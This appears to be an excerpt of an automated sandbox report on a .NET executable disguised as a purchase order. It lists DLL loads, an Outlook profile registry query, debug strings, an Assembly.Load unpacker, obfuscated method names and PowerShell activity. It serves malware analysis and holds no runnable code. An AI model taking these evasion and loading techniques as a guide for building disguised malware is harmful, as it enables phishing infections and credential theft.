Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb< source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531945426.0000000006249000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbL~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Security.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdbpO& source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: >*OoVisualBasic.pdb! source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Web.Extensions.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.pdblZ source: WERE482.tmp.dmp.15.dr
Source:	Binary string: O1.PDB source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WERE482.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
Source:	Binary string: uc.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Web.pdb source: WERE482.tmp.dmp.15.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.cs

.Net Code: lqAGkHILDP System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_0584F8B0 push eax; ret	0_2_0584F8B9
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05878D21 pushad ; retn 0005h	0_2_05878D22
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05878D38 pushad ; retn 0005h	0_2_05878D3A
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05878CC9 pushad ; retn 0005h	0_2_05878CCA
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 0_2_05878F41 pushad ; retn 0005h	0_2_0587916A
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_0280891E pushad ; iretd	4_2_0280891F
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_02808C2F pushfd ; iretd	4_2_02808C30
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_02808DDF push esp; iretd	4_2_02808DE0
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Code function: 4_2_066A890D push es; ret	4_2_066A8920

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: section name: .text entropy: 7.879454728675969

Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, LQ6roNfahGT40yedGd.cs	High entropy of concatenated method names: 'ToString', 'f7KVuH7auJ', 'oBVVPcp3Ud', 'raXVNPVD6q', 'KqJV2cPd1v', 'vuOVc9w8O8', 'usgVxr9Mys', 'AMCVpyU1k8', 'fVUV1oICym', 'tNsV6ahykR'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yuQsZhCGlQrIOb1MOYI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MYTqA0aKZe', 'pWwq4wQH0F', 'fsOqTxXfpS', 'ySrqq8Dx5i', 'QrWqY1YXa6', 'MdsqjsU0rb', 'dqxqOJK34U'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, X3OpRrp6A5Qw3QnkEK.cs	High entropy of concatenated method names: 'YxcvbuNtqa', 'jUmvHFZh3c', 'LGEv8bB8ah', 'P9n8iG8wfV', 'z8Z8zLbMRh', 'xGdvFFcC3d', 'u7fvC43uOV', 'gfNvWvyO5r', 'qifvoSRn7q', 'NrEvGVcRvc'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, T53eivCF2caXpDovmJb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ngw4ui1In6', 'wNe4I4xwTc', 'di84sL5qaH', 'EKm4ykOW0s', 'bU64JkEM2C', 'pR24fJyZAh', 'Ne14QZ3UD5'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, B6ddq9wkjH5U7GO4pH.cs	High entropy of concatenated method names: 'QoTA08276H', 'WMQA7bTxU6', 'QpKAA27yI4', 'P9dATa3onr', 'h0mAYnbQiw', 'TvhAOf1J2t', 'Dispose', 'QI1UbpjGGo', 'jafUEh9mVt', 'UxtUHyhAbE'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, dCk3WECCKpf7Djs99PP.cs	High entropy of concatenated method names: 'YN14iAE069', 'FFB4zchI35', 'sPjTFJSU1H', 'yoTTCtls2P', 'GmfTWZPOQl', 'hAkToJYqvA', 'X2JTGFh0c8', 'jOLTgjCsHi', 'F8iTbTgEAE', 'o0qTEqn0LD'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, lPcJcDyYH8caUrYvem.cs	High entropy of concatenated method names: 'HMU0aY4RfS', 'zvj0Ixmo8C', 'MJ20yEXnop', 'bKv0Jxjwg8', 'uya0PLm16v', 'WGU0NBo4aC', 'xfp02cdqTw', 'kZx0cmrIvN', 'xGE0xu5Sfb', 'pbQ0pA76ZE'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, FAjkdqRXgX4wHWn7Nu.cs	High entropy of concatenated method names: 'TNVHDehN3w', 'AtrHhtmKpn', 'BrvHelvhJx', 'tNjHRNZ8gp', 'CN5H0JSTei', 'EyhHVKn0Hx', 'GaIH7U5uYo', 'tXHHUTUPAq', 'XV8HAGMduf', 'TW5H4q8VHN'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, SlepaGs6lOpi5ORLFD.cs	High entropy of concatenated method names: 'TeI9eNPMH9', 'dhZ9RxeR3w', 'J5B9SIlHu0', 'A2P9PorxLI', 'zit926VpZk', 'gna9co1rjd', 'BgV9pO9h80', 'ej191H76gF', 'zdP9aCaeAM', 'ohL9uQ4ulh'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, x9Zb7eEX75vLyTwYnf.cs	High entropy of concatenated method names: 'Dispose', 'h5UCd7GO4p', 'eLFWPmmimh', 'wNnroxOd8j', 'gEvCirxKiJ', 'GQlCzWOVh5', 'ProcessDialogKey', 'LnZWFWh876', 'wFbWC4mgoa', 'XQdWWYI4q7'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, otZaAEKk5BhEYRRXVl.cs	High entropy of concatenated method names: 'vrLBm9DRvw', 'SHuB3jlgrK', 'HcAHNW4fAX', 'fGaH27Mxq3', 'l0nHcliOC0', 'xHuHxsWoTc', 'ObYHpKIuJq', 'l5NH10xtrK', 'SpcH641G1v', 'KIjHaKKylg'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, bp1hNOLdohwXfjv1NC.cs	High entropy of concatenated method names: 'DXD75w5NC7', 'o6f7irSOQq', 'qZTUFcIIN0', 'utcUC6gsNK', 'I6d7udEd40', 'Deb7IyUhr8', 'BOT7s3L6YW', 'HH67ycbD4V', 'VpF7J9DFJN', 'yPZ7f3e3Np'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, SJLPAsztXMTJ1heyUK.cs	High entropy of concatenated method names: 'bSP4hC7oaV', 'AqR4eC06Yx', 'BF84RWs8VU', 'AST4SguNAu', 'yXE4PFLFPD', 'esw42uBoCy', 'Cr04cLAf6A', 'd9u4OhYl67', 'CVO4txYU8R', 'orJ4l3RB3u'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, ynV3YtGGBGZi2W5ZXK.cs	High entropy of concatenated method names: 'OshCvXfOJm', 'HvhCnyHxF6', 'uXgCXX4wHW', 'k7NCMu0tZa', 'ERXC0Vl16p', 'DkLCV4158n', 'UhhtSvHHgsAExc27iw', 'Aeug4xvZgiBkkbRqhr', 'PPyCC6O3mH', 'ipsCoJDiVb'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, lWh876djFb4mgoa5Qd.cs	High entropy of concatenated method names: 'xhlASqFSHD', 'xVFAPV8biv', 'TrcANYEFTg', 'vNJA28iqqQ', 'IsAAct6u0I', 'lfpAxjK02w', 'YFVApgWlYl', 'WxeA1TiKnN', 'XvaA6OLWkq', 'CvXAa3mwVg'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.cs	High entropy of concatenated method names: 'TMVogbQWrK', 'ocRobafTPZ', 'LskoE3jg1h', 'Q5qoHscLBi', 'jRyoBm16JF', 't2oo8yb0IJ', 'm4wov77YuB', 'RsQonbe4kU', 'WlWoZPYxh7', 'MgKoXBRHxe'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, UhZaceHVUu2xTLG9vZ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hsbWdBjTGS', 'bmNWib3Ntn', 'hrjWzIQjGb', 'j8soFkWp7F', 'MVXoC0OLNZ', 'EENoWkUuno', 'qvMoopQUMv', 'qGridm3gXXFCZ4N6guf'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, A3BY3JWkboPgNObEN9.cs	High entropy of concatenated method names: 'bChka5c3j', 'MIkDCwo3n', 't80hh2skC', 'BBF3i4Unm', 'PuhRjr5kA', 'ml1KRxMKM', 'zd292xSPiVoOhrFiEt', 'LjRS4brupWp5JuKffC', 'idVUMEALE', 'Cbv4gdnb6'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, ggd4Fy6La0clJsEhZS.cs	High entropy of concatenated method names: 'Fk4vtc0BxF', 'PhHvlAxWtG', 'd4CvktmTST', 'WYevDNc4bI', 'JGgvmWhQfa', 'hhnvhw6ZcE', 'jiwv3XUkp2', 'GyFveYr3db', 'SlyvR0u61F', 'trdvKdEeRT'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, uI4q7ki1a4S38bXmTY.cs	High entropy of concatenated method names: 'wWr4HZ6BAe', 'mDk4BpERJE', 'Fsi48T20pQ', 'h1K4vGa6Cs', 'Gam4AwvPcy', 'jnO4nKUJXg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, BXfOJmeNvhyHxF6xHc.cs	High entropy of concatenated method names: 'QoHEyVFUR7', 'X7SEJoE3sD', 'O1sEfyDV65', 'w7bEQLH974', 'fCcErApb9S', 'V7UELJTsZT', 'pbSEwWJy7H', 'I91E543seg', 'jE3EdxTVpd', 'qVJEi0uyYd'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, M6p3kLS4158nyV1U3j.cs	High entropy of concatenated method names: 'ejS8gjoIv1', 'smh8EY4KLi', 'G0x8BoNjDu', 'ngJ8vq86kb', 'W7p8nj8glu', 'K4TBrs7G1y', 'kIoBLxHvqR', 'k4DBw20o6E', 'zSbB5KcwQA', 'gC6BdMOK6G'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
